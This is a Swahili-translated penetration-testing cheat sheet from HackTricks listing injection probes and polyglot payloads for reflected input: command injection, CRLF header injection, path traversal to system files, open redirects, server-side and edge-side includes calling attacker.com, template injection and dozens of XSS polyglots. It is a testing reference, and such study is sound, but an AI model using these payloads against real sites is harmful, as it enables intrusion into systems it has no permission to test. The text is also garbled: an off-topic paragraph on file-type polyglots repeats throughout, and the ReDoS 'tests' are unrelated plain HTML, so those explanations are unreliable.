hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet/README.md

# Reflecting Techniques - PoCs and Polygloths CheatSheet

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

Lengo la PoCs na Polygloths hizi ni kumpa mtihani mchunguzi **muhtasari wa haraka** wa udhaifu ambao anaweza kudukua ikiwa **matokeo ya kuingiza kwake yanarudi kwenye jibu**.

{% hint style="warning" %}
Hati hii ya kudanganya **haitoi orodha kamili ya vipimo kwa kila udhaifu**, bali inatoa vipimo vichache vya msingi tu. Ikiwa unatafuta vipimo kamili zaidi, tafadhali fikia kila udhaifu uliopendekezwa.
{% endhint %}

{% hint style="danger" %}
Hutapata kuingizwa kwa aina ya Maudhui kama XXE, kwa sababu kawaida utajaribu mwenyewe ikiwa utapata ombi linalotuma data ya xml. Hapa pia hutapata kuingizwa kwenye database kwani hata ikiwa baadhi ya maudhui yanaweza kurejelewa, inategemea sana teknolojia na muundo wa DB ya nyuma.
{% endhint %}

## Orodha ya Polygloths

```python
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```

## [Uingizaji wa Kigezo Upande wa Mteja](../client-side-template-injection-csti.md)

### Majaribio ya Msingi

```
{{7*7}}
[7*7]
```

### Polygloths

### Wapolygloths

Polygloths are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. In the context of web applications, polygloths can be used to exploit vulnerabilities and gain unauthorized access.

Wapolygloths ni faili ambazo zinaweza kuchukuliwa kama aina tofauti za faili kulingana na muktadha ambao zinafunguliwa. Hii inaweza kuwa na manufaa kwa kuepuka hatua za usalama au kutekeleza nambari mbaya. Katika muktadha wa programu za wavuti, wapolygloths wanaweza kutumika kudukua udhaifu na kupata ufikiaji usiohalali.

Polygloths can be created by manipulating the file's header or by using specific file formats that allow for multiple interpretations. Some common examples of polygloths include files that can be interpreted as both image and executable files, or files that can be opened as both text and audio files.

Wapolygloths wanaweza kuundwa kwa kubadilisha kichwa cha faili au kwa kutumia muundo maalum wa faili ambao unaruhusu tafsiri nyingi. Baadhi ya mifano ya kawaida ya wapolygloths ni pamoja na faili ambazo zinaweza kuchukuliwa kama faili za picha na za kutekelezwa, au faili ambazo zinaweza kufunguliwa kama faili za maandishi na sauti.

When exploiting polygloths, it is important to understand the different interpretations that can be made and how they can be leveraged to achieve the desired outcome. This may involve manipulating the file's content or using specific tools or techniques to trigger the desired interpretation.

Wakati wa kutumia wapolygloths, ni muhimu kuelewa tafsiri tofauti ambazo zinaweza kufanywa na jinsi zinavyoweza kutumiwa kufikia matokeo yanayotarajiwa. Hii inaweza kuhusisha kubadilisha maudhui ya faili au kutumia zana au mbinu maalum kuzindua tafsiri inayotarajiwa.

```bash
{{7*7}}[7*7]
```

## [Uingizaji Amri](https://github.com/carlospolop/hacktricks/blob/sw/pentesting-web/uingizaji-amri.md)

### Majaribio ya Msingi

```bash
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
```

### Polygloths

### Wapolygloths

Polygloths are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. In the context of web applications, polygloths can be used to exploit vulnerabilities and gain unauthorized access.

Wapolygloths ni faili ambazo zinaweza kuchukuliwa kama aina tofauti za faili kulingana na muktadha ambao zinafunguliwa. Hii inaweza kuwa na manufaa kwa kuepuka hatua za usalama au kutekeleza nambari mbaya. Katika muktadha wa programu za wavuti, wapolygloths wanaweza kutumika kudukua udhaifu na kupata ufikiaji usiohalali.

Polygloths can be created by manipulating the file's header or by using specific file formats that allow for multiple interpretations. Some common examples of polygloths include files that can be interpreted as both image and executable files, or files that can be opened as both text and audio files.

Wapolygloths wanaweza kuundwa kwa kubadilisha kichwa cha faili au kwa kutumia muundo maalum wa faili ambao unaruhusu tafsiri nyingi. Baadhi ya mifano ya kawaida ya wapolygloths ni pamoja na faili ambazo zinaweza kuchukuliwa kama faili za picha na za kutekelezwa, au faili ambazo zinaweza kufunguliwa kama faili za maandishi na sauti.

When exploiting polygloths, it is important to understand the different interpretations that can be made and how they can be leveraged to achieve the desired outcome. This may involve manipulating the file's content or using specific tools or techniques to trigger the desired interpretation.

Wakati wa kutumia wapolygloths, ni muhimu kuelewa tafsiri tofauti ambazo zinaweza kufanywa na jinsi zinavyoweza kutumiwa kufikia matokeo yanayotarajiwa. Hii inaweza kuhusisha kubadilisha maudhui ya faili au kutumia zana au mbinu maalum kuzindua tafsiri inayotarajiwa.

```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```

## [CRLF](../crlf-0d-0a.md)

### Majaribio Muhimu

#### Test 1: CRLF Injection

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
```

#### Test 2: CRLF Injection in Headers

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Referer: http://example.com/%0d%0aSet-Cookie:%20test=test
```

#### Test 3: CRLF Injection in Cookies

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Cookie: test=test%0d%0aSet-Cookie:%20test2=test2
```

#### Test 4: CRLF Injection in Parameters

```http
GET /?param=test%0d%0aSet-Cookie:%20test3=test3 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
```

#### Test 5: CRLF Injection in POST Requests

```http
POST / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

param=test%0d%0aSet-Cookie:%20test4=test4
```

#### Test 6: CRLF Injection in JSON Requests

```http
POST / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/json
Content-Length: 37

{
  "param": "test%0d%0aSet-Cookie:%20test5=test5"
}
```

#### Test 7: CRLF Injection in XML Requests

```http
POST / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/xml
Content-Length: 61

<?xml version="1.0" encoding="UTF-8"?>
<param>test%0d%0aSet-Cookie:%20test6=test6</param>
```

```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```

## Alama Zilizosalia

### Majaribio Muhimu

#### HTML Injection

**Test 1: Kuingiza HTML katika maoni**

* **Lengo**: Kuingiza msimbo wa HTML katika sehemu ya maoni ya wavuti.
* **Maelezo**: Jaribu kuingiza msimbo wa HTML kwenye sehemu ya maoni ya wavuti na angalia ikiwa msimbo huo unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Hatua za kutekeleza**:
  1. Nenda kwenye sehemu ya maoni ya wavuti.
  2. Ingiza msimbo wa HTML kama vile `<script>alert('XSS')</script>` au `<h1>Test</h1>`.
  3. Tuma maoni yako na angalia ikiwa msimbo wa HTML unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Matokeo yanayotarajiwa**: Ikiwa msimbo wa HTML unatekelezwa na kuonyeshwa kwa watumiaji wengine, basi kuna hatari ya kuingizwa kwa msimbo wa hatari kama vile XSS (Cross-Site Scripting).

**Test 2: Kuingiza HTML katika uwanja wa fomu**

* **Lengo**: Kuingiza msimbo wa HTML katika uwanja wa fomu ya wavuti.
* **Maelezo**: Jaribu kuingiza msimbo wa HTML kwenye uwanja wa fomu ya wavuti na angalia ikiwa msimbo huo unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Hatua za kutekeleza**:
  1. Nenda kwenye uwanja wa fomu ya wavuti.
  2. Ingiza msimbo wa HTML kama vile `<script>alert('XSS')</script>` au `<h1>Test</h1>`.
  3. Tuma fomu yako na angalia ikiwa msimbo wa HTML unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Matokeo yanayotarajiwa**: Ikiwa msimbo wa HTML unatekelezwa na kuonyeshwa kwa watumiaji wengine, basi kuna hatari ya kuingizwa kwa msimbo wa hatari kama vile XSS (Cross-Site Scripting).

#### Server-Side Template Injection (SSTI)

**Test 1: Kuingiza msimbo wa SSTI katika uwanja wa fomu**

* **Lengo**: Kuingiza msimbo wa SSTI katika uwanja wa fomu ya wavuti.
* **Maelezo**: Jaribu kuingiza msimbo wa SSTI kwenye uwanja wa fomu ya wavuti na angalia ikiwa msimbo huo unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Hatua za kutekeleza**:
  1. Nenda kwenye uwanja wa fomu ya wavuti.
  2. Ingiza msimbo wa SSTI kama vile `{{7*7}}` au `{{config}}`.
  3. Tuma fomu yako na angalia ikiwa msimbo wa SSTI unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Matokeo yanayotarajiwa**: Ikiwa msimbo wa SSTI unatekelezwa na kuonyeshwa kwa watumiaji wengine, basi kuna hatari ya kuingizwa kwa msimbo wa hatari kwenye mazingira ya seva.

**Test 2: Kuingiza msimbo wa SSTI katika sehemu ya maoni**

* **Lengo**: Kuingiza msimbo wa SSTI katika sehemu ya maoni ya wavuti.
* **Maelezo**: Jaribu kuingiza msimbo wa SSTI kwenye sehemu ya maoni ya wavuti na angalia ikiwa msimbo huo unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Hatua za kutekeleza**:
  1. Nenda kwenye sehemu ya maoni ya wavuti.
  2. Ingiza msimbo wa SSTI kama vile `{{7*7}}` au `{{config}}`.
  3. Tuma maoni yako na angalia ikiwa msimbo wa SSTI unatekelezwa na kuonyeshwa kwa watumiaji wengine.
* **Matokeo yanayotarajiwa**: Ikiwa msimbo wa SSTI unatekelezwa na kuonyeshwa kwa watumiaji wengine, basi kuna hatari ya kuingizwa kwa msimbo wa hatari kwenye mazingira ya seva.

```markup
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
```

## [Kuingiza Faili/Ufuatiliaji wa Njia](https://github.com/carlospolop/hacktricks/blob/sw/pentesting-web/kuingiza-faili/README.md)

### Majaribio ya Msingi

```bash
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```

## [Unganishaji Wazi](../open-redirect.md) / [Udukuzi wa Ombi la Upande wa Seva](../ssrf-server-side-request-forgery/)

### Majaribio ya Msingi

```bash
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
```

## [ReDoS](../regular-expression-denial-of-service-redos.md)

### Majaribio Muhimu

#### Test 1

```html
<details>
  <summary>Click to expand</summary>

  <p>This is a test</p>
</details>
```

#### Test 2

```html
<script>
  alert("This is a test");
</script>
```

#### Test 3

```html
<!-- This is a test -->
```

#### Test 4

```html
<p>This is a test</p>
```

#### Test 5

```html
<div>
  <p>This is a test</p>
</div>
```

#### Test 6

```html
<span>This is a test</span>
```

#### Test 7

```html
<h1>This is a test</h1>
```

#### Test 8

```html
<ul>
  <li>This is a test</li>
</ul>
```

#### Test 9

```html
<ol>
  <li>This is a test</li>
</ol>
```

#### Test 10

```html
<table>
  <tr>
    <td>This is a test</td>
  </tr>
</table>
```

```bash
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
```

## [Kuingiza Upande wa Seva/Kuingiza Upande wa Mwambaa](../server-side-inclusion-edge-side-inclusion-injection.md)

### Majaribio ya Msingi

```markup
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```

### Polygloths

### Wapolygloths

Polygloths are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. In the context of web applications, polygloths can be used to exploit vulnerabilities and gain unauthorized access.

Wapolygloths ni faili ambazo zinaweza kuchukuliwa kama aina tofauti za faili kulingana na muktadha ambao zinafunguliwa. Hii inaweza kuwa na manufaa kwa kuepuka hatua za usalama au kutekeleza nambari mbaya. Katika muktadha wa programu za wavuti, wapolygloths wanaweza kutumika kudukua udhaifu na kupata ufikiaji usiohalali.

Polygloths can be created by manipulating the file's header or by using specific file formats that allow for multiple interpretations. Some common examples of polygloths include files that can be interpreted as both image and executable files, or files that can be opened as both text and audio files.

Wapolygloths wanaweza kuundwa kwa kubadilisha kichwa cha faili au kwa kutumia muundo maalum wa faili ambao unaruhusu tafsiri nyingi. Baadhi ya mifano ya kawaida ya wapolygloths ni pamoja na faili ambazo zinaweza kuchukuliwa kama faili za picha na za kutekelezwa, au faili ambazo zinaweza kufunguliwa kama faili za maandishi na sauti.

When exploiting polygloths, it is important to understand the different interpretations that can be made and how they can be leveraged to achieve the desired outcome. This may involve manipulating the file's content or using specific tools or techniques to trigger the desired interpretation.

Wakati wa kutumia wapolygloths, ni muhimu kuelewa tafsiri tofauti ambazo zinaweza kufanywa na jinsi zinavyoweza kutumika kufikia matokeo yanayotarajiwa. Hii inaweza kuhusisha kubadilisha maudhui ya faili au kutumia zana au mbinu maalum kuzindua tafsiri inayotarajiwa.

```markup
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```

## [Ughushi wa Ombi la Upande wa Seva](../ssrf-server-side-request-forgery/)

Vipimo sawa vinavyotumiwa kwa Ombi la Upande wa Seva linaweza kutumika hapa.

## [Uingizaji wa Kigezo cha Upande wa Seva](../ssti-server-side-template-injection/)

### Vipimo Vya Msingi

```markup
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
```

### Polygloths

### Wapolygloths

Polygloths are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. In the context of web applications, polygloths can be used to exploit vulnerabilities and gain unauthorized access.

Wapolygloths ni faili ambazo zinaweza kuchukuliwa kama aina tofauti za faili kulingana na muktadha ambao zinafunguliwa. Hii inaweza kuwa na manufaa kwa kuepuka hatua za usalama au kutekeleza nambari mbaya. Katika muktadha wa programu za wavuti, wapolygloths wanaweza kutumika kudukua udhaifu na kupata ufikiaji usiohalali.

Polygloths can be created by manipulating the file's header or by using specific file formats that allow for multiple interpretations. Some common examples of polygloths include files that can be interpreted as both image and executable files, or files that can be opened as both text and audio files.

Wapolygloths wanaweza kuundwa kwa kubadilisha kichwa cha faili au kwa kutumia muundo maalum wa faili ambao unaruhusu tafsiri nyingi. Baadhi ya mifano ya kawaida ya wapolygloths ni pamoja na faili ambazo zinaweza kuchukuliwa kama faili za picha na za kutekelezwa, au faili ambazo zinaweza kufunguliwa kama faili za maandishi na sauti.

When exploiting polygloths, it is important to understand the different interpretations that can be made and how they can be leveraged to achieve the desired outcome. This may involve manipulating the file's content or using specific tools or techniques to execute code within the file.

Wakati wa kutumia wapolygloths, ni muhimu kuelewa tafsiri tofauti ambazo zinaweza kufanywa na jinsi wanavyoweza kutumika kufikia matokeo yanayotakiwa. Hii inaweza kuhusisha kubadilisha maudhui ya faili au kutumia zana au mbinu maalum za kutekeleza nambari ndani ya faili.

Polygloths can be used in various hacking scenarios, such as bypassing file upload restrictions, evading antivirus detection, or executing arbitrary code on a target system. However, it is important to note that the use of polygloths for malicious purposes is illegal and unethical.

Wapolygloths wanaweza kutumika katika mazingira mbalimbali ya kudukua, kama vile kuepuka vizuizi vya kupakia faili, kuepuka kugunduliwa na programu za antivirus, au kutekeleza nambari isiyo na kikomo kwenye mfumo wa lengo. Hata hivyo, ni muhimu kuzingatia kwamba matumizi ya wapolygloths kwa madhumuni mabaya ni kinyume cha sheria na si maadili.

```python
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
```

## [XSLT Uvamizi wa Upande wa Seva](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)

### Majaribio ya Msingi

```markup
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```

### Polygloths

### Wapolygloths

Polygloths are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. In the context of web pentesting, polygloths can be used to exploit vulnerabilities in web applications.

Wapolygloths ni faili ambazo zinaweza kuchukuliwa kama aina tofauti za faili kulingana na muktadha ambao zinafunguliwa. Hii inaweza kuwa na manufaa kwa kuepuka hatua za usalama au kutekeleza nambari mbaya. Katika muktadha wa pentesting ya wavuti, wapolygloths wanaweza kutumika kudukua udhaifu katika programu za wavuti.

### File Signatures

### Saini za Faili

File signatures, also known as magic numbers, are unique sequences of bytes that can be used to identify the file type. By manipulating the file signature, a polyglot file can be created that appears as one file type but is interpreted as another.

Saini za faili, pia hujulikana kama nambari za uchawi, ni mfuatano wa pekee wa herufi ambazo zinaweza kutumika kutambua aina ya faili. Kwa kubadilisha saini ya faili, faili ya polyglot inaweza kuundwa ambayo inaonekana kama aina moja ya faili lakini inachukuliwa kama nyingine.

### Examples

### Mifano

Here are some examples of polyglot files:

Hapa kuna mifano ya faili za polyglot:

* A file that appears as a JPEG image but is interpreted as an HTML file.
* Faili ambalo linaonekana kama picha ya JPEG lakini linachukuliwa kama faili ya HTML.
* A file that appears as a PDF document but is interpreted as a PHP script.
* Faili ambalo linaonekana kama hati ya PDF lakini linachukuliwa kama skripti ya PHP.
* A file that appears as a text document but is interpreted as a JavaScript file.
* Faili ambalo linaonekana kama hati ya maandishi lakini linachukuliwa kama faili ya JavaScript.

### Conclusion

### Hitimisho

Polygloths can be powerful tools in the hands of a skilled hacker. By exploiting the ability of files to be interpreted differently depending on the context, polyglot files can be used to bypass security measures and execute malicious code. It is important for web pentesters to be aware of the existence and potential dangers of polyglot files in order to effectively assess and secure web applications.

Wapolygloths wanaweza kuwa zana zenye nguvu mikononi mwa hacker mwenye ujuzi. Kwa kudukua uwezo wa faili kuwa na tafsiri tofauti kulingana na muktadha, faili za polyglot zinaweza kutumika kuepuka hatua za usalama na kutekeleza nambari mbaya. Ni muhimu kwa wapentesters wa wavuti kufahamu uwepo na hatari za faili za polyglot ili kuweza kutathmini na kusaidia programu za wavuti kwa ufanisi.

```markup
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```

## XSS

### Majaribio ya Msingi

#### Stored XSS

Stored XSS ni aina ya mashambulizi ya msalaba wa tovuti ambapo msanidi programu anaruhusu mtumiaji kuingiza data ambayo inaweza kutekelezwa kwenye ukurasa wa wavuti. Hii inaweza kusababisha shambulio la XSS ambapo msimbo mbaya unaweza kutekelezwa kwenye kivinjari cha mtumiaji.

Mifano ya majaribio ya msingi ya Stored XSS ni pamoja na:

* Kuingiza script ya JavaScript kwenye uwanja wa maoni au chapisho la blogi na kuona ikiwa inatekelezwa wakati ukurasa unapakia.
* Kuingiza tag ya  na kujaribu kutekeleza msimbo wa JavaScript kupitia atribyuti ya "src" ili kuona ikiwa inafanya kazi.

#### Reflected XSS

Reflected XSS ni aina ya mashambulizi ya msalaba wa tovuti ambapo msanidi programu anaruhusu mtumiaji kuingiza data ambayo inaweza kutekelezwa kwenye ukurasa wa wavuti. Hii inaweza kusababisha shambulio la XSS ambapo msimbo mbaya unaweza kutekelezwa kwenye kivinjari cha mtumiaji.

Mifano ya majaribio ya msingi ya Reflected XSS ni pamoja na:

* Kuingiza script ya JavaScript kwenye uwanja wa utaftaji na kuona ikiwa inatekelezwa wakati matokeo ya utaftaji yanapopakia.
* Kuingiza tag ya  na kujaribu kutekeleza msimbo wa JavaScript kupitia atribyuti ya "src" ili kuona ikiwa inafanya kazi.

```markup
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
```

### Polygloths

### Wapolygloths

Polygloths are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. In the context of web applications, polygloths can be used to exploit vulnerabilities and gain unauthorized access.

Wapolygloths ni faili ambazo zinaweza kuchukuliwa kama aina tofauti za faili kulingana na muktadha ambao zinafunguliwa. Hii inaweza kuwa na manufaa kwa kuepuka hatua za usalama au kutekeleza nambari mbaya. Katika muktadha wa programu za wavuti, wapolygloths wanaweza kutumika kudukua udhaifu na kupata ufikiaji usiohalali.

Polygloths can be created by manipulating the file's header or by using specific file formats that allow for multiple interpretations. Some common examples of polygloths include files that can be interpreted as both image and executable files, or files that can be opened as both text and audio files.

Wapolygloths wanaweza kuundwa kwa kubadilisha kichwa cha faili au kwa kutumia muundo maalum wa faili ambao unaruhusu tafsiri nyingi. Baadhi ya mifano ya kawaida ya wapolygloths ni pamoja na faili ambazo zinaweza kuchukuliwa kama faili za picha na za kutekelezwa, au faili ambazo zinaweza kufunguliwa kama faili za maandishi na sauti.

When exploiting polygloths, it is important to understand the different interpretations that can be made and how they can be leveraged to achieve the desired outcome. This may involve manipulating the file's content or using specific tools or techniques to trigger the desired interpretation.

Wakati wa kutumia wapolygloths, ni muhimu kuelewa tafsiri tofauti ambazo zinaweza kufanywa na jinsi zinavyoweza kutumika kufikia matokeo yanayotarajiwa. Hii inaweza kuhusisha kubadilisha maudhui ya faili au kutumia zana au mbinu maalum kuzindua tafsiri inayotarajiwa.

```markup
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
```

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
